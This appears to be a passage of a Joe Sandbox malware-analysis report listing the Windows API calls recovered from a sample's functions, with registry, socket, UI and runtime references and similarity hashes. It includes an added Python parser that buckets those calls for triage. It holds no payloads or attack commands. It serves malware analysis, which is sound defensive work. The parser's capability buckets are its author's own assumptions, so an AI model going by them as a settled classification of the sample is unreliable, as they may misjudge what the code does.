                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Enum$CloseDeleteOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2095303065-0
                                                                                                        • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                        • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                        • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                        • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
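                                                                                                        When triaging a report of this size, the per-function "APIs" listings above are the quickest handle on what each recovered function can do. The following parser is an added example written for this page; it is not part of the Joe Sandbox report or its tooling. It reads the listing format exactly as printed above (including the indented "Part of subcall function" lines), turns each reference into a record with the hex `ref` address and argument list, and buckets the calls so that entries which mutate state (the RegDeleteKeyW and WritePrivateProfile* references listed above) stand out from pure UI or synchronisation code. The sample text is constructed from lines of this report, and the capability buckets in `BUCKETS` and `MUTATING` are my own triage assumptions, not categories the report defines.

```python
"""Parse Joe Sandbox per-function 'APIs' listings into records and bucket
them by capability. Added example; not Joe Sandbox code."""
import re
from collections import Counter

# One API reference line, in the three shapes the report uses:
#   • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
#   • SendMessageW.USER32 ref: 00449598
#   • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Triage buckets keyed on API-name prefixes (assumption for this example,
# not a classification the report itself provides).
BUCKETS = {
    "registry": ("RegEnumKey", "RegOpenKey", "RegCloseKey", "RegDeleteKey"),
    "ini-file": ("GetPrivateProfile", "WritePrivateProfile"),
    "sync": ("Interlocked", "Sleep"),
    "ui": ("SendMessage", "GetWindowRect", "ShowWindow", "EnableWindow",
           "TrackPopupMenuEx", "GetCursorPos", "DefDlgProc"),
}
# APIs that change persistent state; an entry using any of these deserves a look.
MUTATING = ("RegDeleteKey", "WritePrivateProfile")

# Constructed sample: two 'APIs' entries copied from this report, separated by
# the 'Memory Dump Source' header that follows each entry on the page.
SAMPLE = """\
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• SendMessageW.USER32 ref: 00449598
  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
• SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
• _wcslen.LIBCMT ref: 0044960D
• _wcslen.LIBCMT ref: 0044961A
• SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
Memory Dump Source
"""


def parse_api_blocks(text):
    """Return one list of call records per 'APIs' entry, in page order."""
    blocks, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            blocks.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            rec = m.groupdict()
            rec["args"] = rec["args"].split(",") if rec["args"] else []
            rec["ref"] = int(rec["ref"], 16)
            rec["sub"] = int(rec["sub"], 16) if rec["sub"] else None
            current.append(rec)
        elif current is not None and stripped and not stripped.startswith("•"):
            current = None  # any other header ('Memory Dump Source', ...) closes the entry
    return blocks


def bucket(api_name):
    """Map an API name to a triage bucket; unknown names fall into 'other'."""
    for name, prefixes in BUCKETS.items():
        if api_name.startswith(prefixes):
            return name
    return "other"


def triage(blocks):
    """Summarise each entry: lowest ref address, bucket counts, mutation flag."""
    summary = []
    for block in blocks:
        counts = Counter(bucket(rec["api"]) for rec in block)
        summary.append({
            "first_ref": min(rec["ref"] for rec in block) if block else None,
            "buckets": dict(counts),
            "mutates": any(rec["api"].startswith(MUTATING) for rec in block),
            "calls": [rec["api"] for rec in block],
        })
    return summary


if __name__ == "__main__":
    for entry in triage(parse_api_blocks(SAMPLE)):
        flag = "MUTATES" if entry["mutates"] else "read-only"
        print(f"{entry['first_ref']:08X} {flag:9} {entry['buckets']} {entry['calls']}")
```

                                                                                                        Run against the whole report text rather than the sample, the `triage` output sorted by `mutates` and then by `first_ref` gives a short list of function entries to open first in the dump, which is how one would get from a listing this long to the handful of functions worth reversing by hand.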
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: RectWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 861336768-0
                                                                                                        • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                        • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                        • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                        • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 00449598
                                                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                        • _wcslen.LIBCMT ref: 0044960D
                                                                                                        • _wcslen.LIBCMT ref: 0044961A
                                                                                                        • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                        • String ID:
                                                                                                        • API String ID: 1856069659-0
                                                                                                        • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                        • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                        • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                        • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                        APIs
                                                                                                        • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                        • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                        • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                        • TrackPopupMenuEx.USER32(033C6420,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CursorMenuPopupTrack$Proc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1300944170-0
                                                                                                        • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                        • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                        • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                        • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                        APIs
                                                                                                        • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                        • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                        • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                        • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                        • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1822080540-0
                                                                                                        • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                        • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                        • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                        • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                        • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 659298297-0
                                                                                                        • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                        • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                        • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                        • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(033C1B38,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(033C1B38,000000F1,00000001,00000000), ref: 00440E9A
Memory Dump Source
• Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
Similarity
• API ID: Window$EnableMessageSend$LongShow
• API String ID: 142311417-0
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• API String ID: 3087257052-0
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• API String ID: 245547762-0
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• API String ID: 2338827641-0
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Similarity
• API ID: CounterPerformanceQuerySleep
• API String ID: 2875609808-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• API String ID: 3741023627-0
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                        • String ID:
                                                                                                        • API String ID: 4023252218-0
                                                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1489400265-0
                                                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1042038666-0
                                                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                        • String ID:
                                                                                                        • API String ID: 2625713937-0
                                                                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                        • __getptd.LIBCMT ref: 00417826
                                                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                                                        • __lock.LIBCMT ref: 00417844
                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 938513278-0
                                                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                        APIs
                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
